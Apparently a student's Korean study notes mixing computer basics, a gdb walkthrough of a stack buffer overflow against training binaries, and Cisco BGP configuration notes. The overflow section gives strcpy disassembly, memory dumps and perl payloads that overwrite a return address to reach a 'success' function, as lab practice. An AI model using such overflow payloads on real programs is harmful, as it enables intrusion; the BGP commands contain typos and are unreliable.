코롱코롱

컴퓨터란 ?

 사전적 의미
     계산기,계산자

 data를 저장하고 처리(계산) 할 수 있는 좀더 복잡한 계산기
   일반적으로 운영체제를 이용해서 사용
   windows,unix,linux 등
   컴튜터의 전체적인 기능을 제어

cpu(Central processing Unit)
 중앙처리장치

기억장치
 RAM(Random Access Memory)
 ROM(Read only memory)

전기적인 신호만 인식

system bus
  데이터가 이동하는 경로
    8bit,16bit,32bit,64bit  - 여러장치를연결해 주는통로

컴퓨터의 데이터 단위

1bit =컴퓨터의 최소 단위 0,1로 표현
1byte =8bit
1kbyte= 1024byte
1mbyte=1024kbyte
1Gbyte=1024Mbyte
1Teraabyte=1024Gbyte

아스키 코드
1byte를 이용한 문자와 숫자로 표현
2^8 개의 문자와 순자 표현

유니 코드
아스키 코드로 부족한 문자의 표현을 위해 제정
2byte 를 이용한 문자와 숫자의 표현
일본어 중국어 , 한국어 ,아랍권 언어를 표현

언어의 종류
 Low Level language
  기계어,어셈블리 등
  High Level language
    c,java 등
 very High Level Language
  Lisp,prologue 등 -인공지능에 사용.
언어의 정해진 문법에 따라 프로그래밍.

i fun
Non-debugging symbols:
0x08048278  _init
0x080482a0  __libc_start_main
0x080482b0  printf
0x080482c0  exit
0x080482d0  strcpy
0x08048304  call_gmon_start
0x08048328  __do_global_dtors_aux
0x08048364  frame_dummy
0x08048390  success  <- 목표함수
0x080483a8  main
0x080483fc  __libc_csu_init
0x0804842c  __libc_csu_fini
0x08048460  __do_global_ctors_aux
0x08048484  _fini

Dump of assembler code for function success:
0x08048390 <success+0>: push   %ebp
0x08048391 <success+1>: mov    %esp,%ebp
0x08048393 <success+3>: sub    $0x8,%esp
0x08048396 <success+6>: sub    $0xc,%esp
0x08048399 <success+9>: push   $0x80484a8
0x0804839e <success+14>:        call   0x80482b0 <printf>
0x080483a3 <success+19>:        add    $0x10,%esp
0x080483a6 <success+22>:        leave
0x080483a7 <success+23>:        ret
End of assembler dump.

 

Dump of assembler code for function main:
0x080483a8 <main+0>:    push   %ebp
0x080483a9 <main+1>:    mov    %esp,%ebp
0x080483ab <main+3>:    sub    $0x18,%esp <- 24byte  ebp 까지 합쳐서 28바이트
0x080483ae <main+6>:    and    $0xfffffff0,%esp
0x080483b1 <main+9>:    mov    $0x0,%eax
0x080483b6 <main+14>:   sub    %eax,%esp
0x080483b8 <main+16>:   cmpl   $0x1,0x8(%ebp)
0x080483bc <main+20>:   jg     0x80483c8 <main+32>
0x080483be <main+22>:   sub    $0xc,%esp
0x080483c1 <main+25>:   push   $0x0
0x080483c3 <main+27>:   call   0x80482c0 <exit>
0x080483c8 <main+32>:   sub    $0x8,%esp
0x080483cb <main+35>:   mov    0xc(%ebp),%eax
0x080483ce <main+38>:   add    $0x4,%eax
0x080483d1 <main+41>:   pushl  (%eax)
0x080483d3 <main+43>:   lea    0xffffffe8(%ebp),%eax
0x080483d6 <main+46>:   push   %eax
0x080483d7 <main+47>:   call   0x80482d0 <strcpy>
0x080483dc <main+52>:   add    $0x10,%esp
0x080483df <main+55>:   sub    $0x8,%esp
0x080483e2 <main+58>:   lea    0xffffffe8(%ebp),%eax
0x080483e5 <main+61>:   push   %eax
0x080483e6 <main+62>:   push   $0x80484bb
0x080483eb <main+67>:   call   0x80482b0 <printf>
0x080483f0 <main+72>:   add    $0x10,%esp
0x080483f3 <main+75>:   mov    $0x0,%eax
0x080483f8 <main+80>:   leave
0x080483f9 <main+81>:   ret
0x080483fa <main+82>:   nop
0x080483fb <main+83>:   nop
End of assembler dump.

0x08048390 <- success 의 메모리주소
메모리 주소를 2개로 묶어서
거꾸로 한다

08 04 83 90

90 83 04 08

./base `perl -e 'print "A"x28, "\x90\x83\x04\x08"

 

mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
Base3 파일을 이용한 언더플로우

 

(gdb)
      i fun
All defined functions:

Non-debugging symbols:
0x08048278  _init
0x080482a0  __libc_start_main
0x080482b0  printf
0x080482c0  exit
0x080482d0  strcpy
0x08048304  call_gmon_start
0x08048328  __do_global_dtors_aux
0x08048364  frame_dummy
0x08048390  success <- 공격타겟
0x080483a8  main
0x08048420  __libc_csu_init
0x08048450  __libc_csu_fini
0x08048484  __do_global_ctors_aux
0x080484a8  _fini
(gdb)

 

(gdb)

      disass main
Dump of assembler code for function main:
0x080483a8 <main+0>:    push   %ebp
0x080483a9 <main+1>:    mov    %esp,%ebp
0x080483ab <main+3>:    sub    $0x368,%esp
0x080483b1 <main+9>:    and    $0xfffffff0,%esp
0x080483b4 <main+12>:   mov    $0x0,%eax
0x080483b9 <main+17>:   sub    %eax,%esp
0x080483bb <main+19>:   sub    $0xc,%esp
0x080483be <main+22>:   push   $0x80484dc
0x080483c3 <main+27>:   call   0x80482b0 <printf>
0x080483c8 <main+32>:   add    $0x10,%esp
0x080483cb <main+35>:   cmpl   $0x1,0x8(%ebp)
0x080483cf <main+39>:   jg     0x80483eb <main+67>
0x080483d1 <main+41>:   sub    $0xc,%esp
0x080483d4 <main+44>:   push   $0x80484e1
0x080483d9 <main+49>:   call   0x80482b0 <printf>
0x080483de <main+54>:   add    $0x10,%esp
0x080483e1 <main+57>:   sub    $0xc,%esp
0x080483e4 <main+60>:   push   $0x0
0x080483e6 <main+62>:   call   0x80482c0 <exit>
0x080483eb <main+67>:   sub    $0x8,%esp
0x080483ee <main+70>:   mov    0xc(%ebp),%eax
0x080483f1 <main+73>:   add    $0x4,%eax
0x080483f4 <main+76>:   pushl  (%eax)
0x080483f6 <main+78>:   lea    0xfffffea8(%ebp),%eax
0x080483fc <main+84>:   push   %eax    <-break
0x080483fd <main+85>:   call   0x80482d0 <strcpy>
0x08048402 <main+90>:   add    $0x10,%esp <-break
0x08048405 <main+93>:   sub    $0x8,%esp
0x08048408 <main+96>:   lea    0xffffff78(%ebp),%eax
0x0804840e <main+102>:  push   %eax
0x0804840f <main+103>:  push   $0x80484ee
0x08048414 <main+108>:  call   0x80482b0 <printf>
0x08048419 <main+113>:  add    $0x10,%esp
0x0804841c <main+116>:  leave
0x0804841d <main+117>:  ret
0x0804841e <main+118>:  nop
0x0804841f <main+119>:  nop
End of assembler dump.

 

 

break 걸고 실행 시...

(gdb) run AAAAAAAAAA
Starting program: /home/s27/sperue/base3 AAAAAAAAAA
hi~

Breakpoint 1, 0x080483fc in main ()
(gdb) info reg
eax            0xbffff3a0       -1073744992
ecx            0x4212ee20       1108536864
edx            0x4      4
ebx            0x42130a14       1108544020
esp            0xbffff184       0xbffff184
ebp            0xbffff4f8       0xbffff4f8
esi            0x40015360       1073828704
edi            0x8048450     AA34513744
eip            0x80483fc        0x80483fc
eflags         0x286    646
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x33     51
(gdb)

break1 ...

(gdb)
      x/12
           0x080483fc
0x80483fc <main+84>:    0xfecee850      0xc483ffff      0x08ec8310      0xff78858d
0x804840c <main+100>:   0x6850ffff      0x080484ee      0xfffe97e8      0x10c483ff
0x804841c <main+116>:   0x9090c3c9      0x56e58955      0xfe4ee853      0xf8b8ffff
(gdb)

Breakpoint 1, 0x080483fc in main ()
(gdb) x/12 $esp
0xbfffda04:     0xbffffbea      0x0804959c      0x40015a38      0x00000000
0xbfffda14:     0x400169e0      0xecef4f04      0x0003007a      0x00000000
0xbfffda24:     0x01000000      0x00000000      0x00000000      0x00000000
(gdb)

 

Breakpoint 2, 0x08048402 in main ()
(gdb) x/12
           0x08048402
0x8048402 <main+90>:    0x8310c483      0x858d08ec      0xffffff78      0x84ee6850
0x8048412 <main+106>:   0x97e80804      0x83fffffe      0xc3c910c4      0x89559090
0x8048422 <__libc_csu_init+2>:  0xe85356e5      0xfffffe4e      0x0494f8b8
0x94f82d08
(gdb)

Breakpoint 2, 0x08048402 in main ()
(gdb) x/13 $esp
0xbfffda00:     0xbfffdc20      0xbffffbea      0x0804959c      0x40015a38
0xbfffda10:     0x00000000      0x400169e0      0xecef4f04      0x0003007a
0xbfffda20:     0x00000000      0x01000000      0x00000000      0x00000000
0xbfffda30:     0x00000000
(gdb)

0x08048390
90830408

ebp 값 - A 시작된 메모리 주소 = 값

0xbfffeb10

 

(gdb)
0xbfffeb00:     0xbfffeb40      0x4000914d      0x42010c7f      0x08048216
0xbfffeb10:     0x41414141      0x41414141      0x41414141      0x41414141
0xbfffeb20:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb)
0xbfffeb30:     0x40004141      0x4001582c      0x40015bd4      0x080481f5
0xbfffeb40:     0xbfffec20      0x40008156      0x080481f5      0x0177ff8e
0xbfffeb50:     0x08048168      0xbfffebd0      0x40015b88      0x00000001
(gdb)
      i functions $ebp
All functions matching regular expression "$ebp":
(gdb) i reg $ebp
ebp            0xbfffec68       0xbfffec68
(gdb)

 

[s27@TRAININGSERVER sperue]$ ./base3 `perl -e 'print "A"x348, "\x90\x83\x04\x08"'`
hi~
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 릡
You're Best!!!
세그멘테이션 오류
[s27@TRAININGSERVER sperue]$

 BGP 에서 .관계를 피어 ...네이버   peers = neighbors 


다른 as 시스템간에 ....네이버는 EBGP 익스터널BGP




===========================================================


as1                                        as2
R 4----------------    R 1-------------------------- R2

             10.1.41.0                        10.1.12.0
R4
router bgp 1
neighbor 10.1.41.1 remote-as 2


R4

router eigrp 109
network 10.1.41.0 0.0.0.255


R1
router bgp 2
 neighbor 10.1.41.4 remote-as 1 (ebgp)
 neighbor 10.1.12.2 remote -as 2 (ibgp)


R2
router bgp 2
neighbor 10.1.12.1 rebote -as 2 ( ibgp)
network 2.2.2.0 mask 255.255.255.0


show ip bgp summary (show ip bgp neighbor)



3대 법칙
 
1. next -hop
(next 도달가능 유무)


2.sprit-horizon
(ibgp ->ibgp)
=full mach

3. sync
ibgp -> igp 확인)

cospf.eigrp
끄는 명령어 no sy
===================================================================

router bgp 2
neighbor 10.1.23.3 remote-as 2


--------------------------------------------------------
R1

router bgp 2
network 10.1.12.0 mask 255.255.255.0

R2
rotuer bgp 2
network 10.1.23.0 mask 255.255.255.0


no router bgp 2
no router ospf 1



문제 5

R1 적용되는 법칙 없음

문제 6
R2 (next-hop문제 ) ==> connected redi
     (sync문제)      ===> nosync

문제 7
R3  (sprit-horizon문제) ==> full mesh
(next-hop문제) ==> connected redi
(sync문제) ==> no sync

-------------------------------------------------------------------------------------------

D

router bgp 65102
nei 1.1.1.1 remote-as 645102
nei 1.1.1.1 update-source loopback 0


A
router bgp 65102
nei 4.4.4.4 remote-ad 65102
nei 4.4.4.4 update-source lo 0


---------------------------------------------------
9일차 ...25 장 ..






igp 에서
B
router ospf 1
redistribute connected subnets


BGP
B

router bgp
neighbor 172.20.10.2

test